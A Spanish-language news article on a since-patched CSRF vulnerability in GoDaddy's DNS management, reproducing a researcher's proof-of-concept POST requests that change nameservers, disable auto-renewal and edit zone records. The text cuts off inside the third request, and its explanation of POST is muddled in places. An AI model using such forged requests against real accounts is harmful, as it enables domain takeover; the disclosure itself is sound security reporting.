GoDaddy corrige vulnerabilidad CSRF que podría haber comprometido sitios alojados

Table Of Contents

• GoDaddy ha corregido una vulnerabilidad CSRF que podría haber permitido a los atacantes apoderarse de dominios registrados con GoDaddy
• Fallo en DNS
• Prueba de Concepto (PoC)
• Parche

GoDaddy ha corregido una vulnerabilidad CSRF que podría haber permitido a los atacantes apoderarse de dominios registrados con GoDaddy

Mientras Dylan Saccomanni gestionaba un antiguo dominio registrado en GoDaddy, notó que el dominio no tenía ninguna protección contra la vulnerabilidad de falsificación de solicitudes entre sitios (CSRF) en muchos de sus dominios. Esta brecha era tan grave que un atacante podría haberla utilizado para apoderarse de todo el dominio y la víctima (comprador del dominio) ni siquiera sabría lo que había sucedido. La vulnerabilidad ha sido corregida desde entonces.

Fallo en DNS

Saccomanni dijo que notó el fallo en las acciones de gestión de DNS de GoDaddy. Las acciones de gestión de DNS en el sitio web de GoDaddy son solicitudes POST que cambian el estado (sin token CSRF en el cuerpo de la solicitud o encabezados, y sin aplicación de Referer o Content-Type).

Las solicitudes POST que el servidor acepta la entidad encerrada en la solicitud como un nuevo subordinado del recurso web identificado por la URI. Los datos enviados por POST podrían ser, por ejemplo, una anotación para recursos existentes; un mensaje para un tablón de anuncios, grupo de noticias, lista de correo o hilo de comentarios; un bloque de datos que es el resultado de enviar un formulario web a un proceso de manejo de datos; o un elemento para agregar a una base de datos. Una solicitud POST se utiliza para enviar datos al servidor para ser procesados de alguna manera, como por un script CGI. Una solicitud POST es diferente de una solicitud GET en las siguientes formas:

• Hay un bloque de datos enviado con la solicitud, en el cuerpo del mensaje. Generalmente hay encabezados adicionales para describir este cuerpo del mensaje, como Content-Type: y Content-Length:.

• La URI de la solicitud no es un recurso para recuperar; generalmente es un programa para manejar los datos que estás enviando.

• La respuesta HTTP es normalmente la salida del programa, no un archivo estático.
  El uso más común de POST, con diferencia, es enviar datos de formularios HTML a scripts CGI.

Los mensajes POST, irónicamente, están destinados a proporcionar seguridad a la solicitud.

La falsificación de solicitudes entre sitios (CSRF) es un tipo de ataque que ocurre cuando un sitio web malicioso, correo electrónico, blog, mensaje instantáneo o programa hace que el navegador web de un usuario realice una acción no deseada en un sitio de confianza para el cual el usuario está actualmente autenticado.

Sin embargo, GoDaddy no tenía ninguna seguridad en su lugar, por lo que Saccomanni pudo explotar fácilmente la vulnerabilidad. Saccomanni dijo que, “De hecho, podrías editar los servidores de nombres, cambiar la configuración de renovación automática y editar el archivo de zona completamente sin ninguna protección CSRF en el cuerpo de la solicitud o encabezados.”

Prueba de Concepto (PoC)

La PoC proporcionada por Saccomanni se reproduce a continuación:

Servidores de Nombres

Aquí está la solicitud POST para guardar una edición de los servidores de nombres:

POST /dcc50/Modals/DomainActions/NSManageWS.asmx/ValidateNameserver HTTP/1.1
Host: dcc.godaddy.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 175
Cookie: [REDACTED]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache {‘request’:’{“isall”:false,”nsobjs”:[{“ns”:”foo.example.com”,”ips”: [],”index”:0,”add”:1,”status”:””}, {“ns”:”bar.example.com”,”ips”: [],”index”:1,”add”:1,”status”:””}]}’}

Renovación Automática

Aquí hay una solicitud POST para cambiar la renovación automática a APAGADO:

POST /dcc50/Modals/DomainActions/AutoRenewWS.asmx/Commit HTTP/1.1
Host: dcc.godaddy.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 71
Cookie: [REDACTED]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache {‘request’:’{“isAutoRenew”:false,”isExtendedAR”:false,”extARYears”:0}’}

Archivo de Zona DNS

Aquí hay una solicitud POST para editar registros DNS en el administrador clásico:

POST /ZoneFile_WS.asmx/SaveRecords HTTP/1.1
Host: dns.godaddy.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=utf-8
Content-Length: 922
Cookie: [REDACTED]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache {“sInput”:”< PARAMS >< PARAM name=\